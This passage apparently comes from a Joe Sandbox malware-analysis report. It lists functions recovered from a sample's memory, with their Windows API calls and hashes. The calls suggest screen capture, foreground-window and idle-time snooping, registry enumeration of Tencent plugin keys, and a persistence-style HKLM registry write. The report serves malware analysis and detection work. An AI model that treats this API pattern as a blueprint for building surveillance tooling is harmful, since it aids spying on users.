                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1483550337-0
                                                                                                                                                                      • Opcode ID: e333a28fe7bd0500b68eb568d3bf82cb031ba832698464be7ee179008a8af412
                                                                                                                                                                      • Instruction ID: d368b340142e0c5ef68f7241a405f712ee075b62f9fc1bd6775d60bb24d92fd2
                                                                                                                                                                      • Opcode Fuzzy Hash: e333a28fe7bd0500b68eb568d3bf82cb031ba832698464be7ee179008a8af412
                                                                                                                                                                      • Instruction Fuzzy Hash: AB614BB5D0021DEFDF10EFA8D88899EBBB8FF49710F10862AE515AB201DB349906CF50
                                                                                                                                                                      Function 03776490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 037764C2
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037764E2
                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03776524
                                                                                                                                                                      • _memset.LIBCMT ref: 03776560
                                                                                                                                                                      • _memset.LIBCMT ref: 0377658E
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765BA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765C3
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765D5
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03776625
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03776635
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Tencent\Plugin\VAS, xrefs: 037764D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                                                                      • String ID: Software\Tencent\Plugin\VAS
                                                                                                                                                                      • API String ID: 2921034913-3343197220
                                                                                                                                                                      • Opcode ID: df5926fe2735e04975fa89453bb97df957786e52e1df3aa2fba6b5902b2fd1e5
                                                                                                                                                                      • Instruction ID: 646747d270d9d4e3e28da14f7a28ba035ee289f0e0975c3f1606fe7649216a83
                                                                                                                                                                      • Opcode Fuzzy Hash: df5926fe2735e04975fa89453bb97df957786e52e1df3aa2fba6b5902b2fd1e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 414197F5A4021CBBDB34EB54CD85FEAB37DDB48700F404599E709B7085EA70AA858FA4
                                                                                                                                                                      Function 0377A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0377A48D
                                                                                                                                                                      • _malloc.LIBCMT ref: 0377A4D1
                                                                                                                                                                      • _free.LIBCMT ref: 0377A503
                                                                                                                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0377A522
                                                                                                                                                                      • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0377A594
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0377A59F
                                                                                                                                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0377A5C5
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0377A5DD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 2794124522-3042966939
                                                                                                                                                                      • Opcode ID: 78df209799f19235550f4dd0adf8cc7148d4f6e0b6214ba97010de9f5fbc53c8
                                                                                                                                                                      • Instruction ID: 6806dcc5639044ec920cb9fcd8b1d4775be5ff4c3db0e1745a74ed0e61ee4c7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 78df209799f19235550f4dd0adf8cc7148d4f6e0b6214ba97010de9f5fbc53c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 25515775D01219AFEF54EFA4D848EEEB7B8AF4C740F048559E905AB350D734A905CBE0
                                                                                                                                                                      Function 02C652B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C65382
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C65392
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C7C6E0,000012A0), ref: 02C653B0
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C653BB
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C6540F
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C6541B
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C65434
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                      • Opcode ID: 0820d44fcda2aaa58cf1ed925fbc5d0f297524f15e20a068f76598328ef08b15
                                                                                                                                                                      • Instruction ID: 42e4a8aa6bbd6c4d29836d951defa82327ee23ab81bb9f9b0f2d22bdc8c34290
                                                                                                                                                                      • Opcode Fuzzy Hash: 0820d44fcda2aaa58cf1ed925fbc5d0f297524f15e20a068f76598328ef08b15
                                                                                                                                                                      • Instruction Fuzzy Hash: 53413B31A842859FD3108F3488CDF7A7BA5EF85B84FFC0569E589D6142D7B0DA0AC791
                                                                                                                                                                      Function 02C652D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C65382
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C65392
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C7C6E0,000012A0), ref: 02C653B0
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C653BB
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C6540F
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C6541B
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C65434
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                      • Opcode ID: a6b56000a86b1d748d02cd9650c00aabe69d6cc57e68e612fda96ea90b50eeef
                                                                                                                                                                      • Instruction ID: 63d6e3dbb1725607adb4fc3297d85b3f4b4e77b697ef4c6e6ae3a821c47dfca8
                                                                                                                                                                      • Opcode Fuzzy Hash: a6b56000a86b1d748d02cd9650c00aabe69d6cc57e68e612fda96ea90b50eeef
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31B9306843859FD711CF30889DF797BA5AF85784FEC0969E6899A142C7B0DA0AC791
                                                                                                                                                                      Function 0377CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,037912F8,A0516FA3,00000001,00000000,00000000), ref: 0377CAB1
                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(037912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0377CAE0
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CB44
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CB53
                                                                                                                                                                      • RegEnumValueW.KERNEL32(037912F8,?,00000000,?,00000000,?,00000000,?), ref: 0377CB72
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                        • Part of subcall function 0377F707: __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      • RegCloseKey.KERNEL32(037912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,037912F8,000000FF), ref: 0377CC83
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                                                                      • String ID: Console\0
                                                                                                                                                                      • API String ID: 1348767993-1253790388
                                                                                                                                                                      • Opcode ID: e6025bb7ac37f77b8121e8a3c46262e1edab58d1dd10f3b38b6b37a65ab11ce0
                                                                                                                                                                      • Instruction ID: 0810fc811445810694545fcc4d6042d1687a36b6cb98c92983e593a8671dda0e
                                                                                                                                                                      • Opcode Fuzzy Hash: e6025bb7ac37f77b8121e8a3c46262e1edab58d1dd10f3b38b6b37a65ab11ce0
                                                                                                                                                                      • Instruction Fuzzy Hash: CF612EB5E00219AFDB04DFA8D884EAEB7B8FF49310F14466AE915EB345D7349901CBA0
                                                                                                                                                                      Function 0377BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BB21
                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0377BB37
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377BB3D
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377BB66
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0377BB6F
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0377BB83
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                                                                      • String ID: %d min
                                                                                                                                                                      • API String ID: 3754759880-1947832151
                                                                                                                                                                      • Opcode ID: 693f91f3f3e68995d6d359d6875637f2a7959a22ea6e320dfec4591fd994c164
                                                                                                                                                                      • Instruction ID: 7faf6a79acc2a6a0ad478ddafed1b9760a376ee19dafcc01b5ae9dfe6d9efbcd
                                                                                                                                                                      • Opcode Fuzzy Hash: 693f91f3f3e68995d6d359d6875637f2a7959a22ea6e320dfec4591fd994c164
                                                                                                                                                                      • Instruction Fuzzy Hash: 9941A4B5900218AFCB10EFA4D889EAFBBB8EF48700F18C555E9099B345D6749A04CBE1
                                                                                                                                                                      Function 03776910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(A0516FA3,00000000,00000000,75BF73E0,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776938
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776947
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776960
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 0377696B
                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037769BE
                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037769CC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,037910DB,000000FF), ref: 03776A2E
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,037910DB,000000FF), ref: 03776A34
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 429299433-0
                                                                                                                                                                      • Opcode ID: f5f2186789657871f047252c4bca321e185e432086efe46a29c7fc163e8be425
                                                                                                                                                                      • Instruction ID: 6d43e1416500c2088c2592cf5952704e263cdf92fa992d3aa9c2210dd331253d
                                                                                                                                                                      • Opcode Fuzzy Hash: f5f2186789657871f047252c4bca321e185e432086efe46a29c7fc163e8be425
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C41D6B2E40618AFCF10EFA8CC84AAEF7B8FB44710F15462AD915F7245D7755901CBA0
                                                                                                                                                                      Function 03776D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03776DD9
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,03795164,00000000,00020019,75BF73E0), ref: 03776DFC
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03776E4A
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,03795148), ref: 03776E60
                                                                                                                                                                      • lstrcpyW.KERNEL32(037756EA,?), ref: 03776E72
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                      • String ID: GROUP
                                                                                                                                                                      • API String ID: 2102619503-2593425013
                                                                                                                                                                      • Opcode ID: 4ccad3bd3b9e6858921c5facdf35f66ae95dee605e4013ec76621d6e6b912cda
                                                                                                                                                                      • Instruction ID: 65432b5d98424d1a279ce95e7bb93f936c64c339c3ca769bfd537d13fd981dd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccad3bd3b9e6858921c5facdf35f66ae95dee605e4013ec76621d6e6b912cda
                                                                                                                                                                      • Instruction Fuzzy Hash: 02316571940319BBDB20DF94DD89B9EB7B8FB08710F104699E519A6180DBB8AA84CF60
                                                                                                                                                                      Function 0377FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377FA4E
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0377FA5A
                                                                                                                                                                      • __getptd.LIBCMT ref: 0377FA67
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0377F9C4,00000000,00000000,0377E003), ref: 0377FA9E
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,0377E003,00000000,00000000,03775F40,00000000,00000000,00000000), ref: 0377FAA8
                                                                                                                                                                      • _free.LIBCMT ref: 0377FAB1
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0377FABC
                                                                                                                                                                        • Part of subcall function 0377F91B: __getptd_noexit.LIBCMT ref: 0377F91B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                      • Opcode ID: fbb4e505ea1dab4665160bfc22d89a209f8b7aa0e2f5dd010a61773465854152
                                                                                                                                                                      • Instruction ID: 99e16866ce299e07a3438e494619ac8f8170151bb59549858a55864e6aff2ab2
                                                                                                                                                                      • Opcode Fuzzy Hash: fbb4e505ea1dab4665160bfc22d89a209f8b7aa0e2f5dd010a61773465854152
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A11E53A24470ABFDF11FFA9ED84D9B37D9DF06A707154426F914CA180DB70D4018B61
                                                                                                                                                                      Function 02C6721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C67240
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C6724C
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C67259
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,02C671B6,00000000,?,?), ref: 02C67290
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C6729A
                                                                                                                                                                      • _free.LIBCMT ref: 02C672A3
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 02C672AE
                                                                                                                                                                        • Part of subcall function 02C6710D: __getptd_noexit.LIBCMT ref: 02C6710D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                      • Opcode ID: 7724792d044695751e09ccbd91a41214441ac5eade4c6949e1464356adaf2ad1
                                                                                                                                                                      • Instruction ID: 04efbba2988ba3866a48565bf924569cf8e94f4cff7ed0decc6393751fdaf300
                                                                                                                                                                      • Opcode Fuzzy Hash: 7724792d044695751e09ccbd91a41214441ac5eade4c6949e1464356adaf2ad1
                                                                                                                                                                      • Instruction Fuzzy Hash: 52110832100306AFDB11AFA5DCCCEBBB7D9EF4577CB10082AF91886140DB31C5199EA0
                                                                                                                                                                      Function 03777410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03777523), ref: 0377743D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777444
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 03777452
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 0377745A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      • API String ID: 3433367815-192647395
                                                                                                                                                                      • Opcode ID: 7d61b1d63dd8d688d2b2a5c8f9c71ee480e5bcb7d7ae6528d9e4446dbd33615f
                                                                                                                                                                      • Instruction ID: 0e3779339cf90f0c37dc0ed91646a905ad53c04dda72a05b567e37eea85417ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d61b1d63dd8d688d2b2a5c8f9c71ee480e5bcb7d7ae6528d9e4446dbd33615f
                                                                                                                                                                      • Instruction Fuzzy Hash: AE014FB0D0020DAFCF54EFB499446BEBBF5EB08200F5446AAD959E3241E6398A10CFA1
                                                                                                                                                                      Function 0377F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377F9CA
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsGetValue.KERNEL32(00000000,03783DF9,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000), ref: 03783CA9
                                                                                                                                                                        • Part of subcall function 03783CA0: DecodePointer.KERNEL32(?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06,0000000D), ref: 03783CBB
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsSetValue.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783CCA
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0377F9D5
                                                                                                                                                                        • Part of subcall function 03783C80: TlsGetValue.KERNEL32(?,?,0377F9DA,00000000), ref: 03783C8E
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0377F9E8
                                                                                                                                                                        • Part of subcall function 03783CD4: DecodePointer.KERNEL32(?,?,?,0377F9ED,00000000,?,00000000), ref: 03783CE5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0377F9F1
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F9F8
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377F9FE
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0377FA1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                      • Opcode ID: 16d3308d3abf38425035f9e9eabc75d9d56e2e1cb95fa80e71b3a064d78efbd7
                                                                                                                                                                      • Instruction ID: 08d718d23167602a97818726a1a1893d4a424eeb75263a1e5f4b923838374590
                                                                                                                                                                      • Opcode Fuzzy Hash: 16d3308d3abf38425035f9e9eabc75d9d56e2e1cb95fa80e71b3a064d78efbd7
                                                                                                                                                                      • Instruction Fuzzy Hash: 63F0307C640344BBDB08FF75CA4C80E7BEDAF896457258958E9098F252EA34D846CBA1
                                                                                                                                                                      Function 02C671B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C671BC
                                                                                                                                                                        • Part of subcall function 02C69754: TlsGetValue.KERNEL32(00000000,02C698AD,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000), ref: 02C6975D
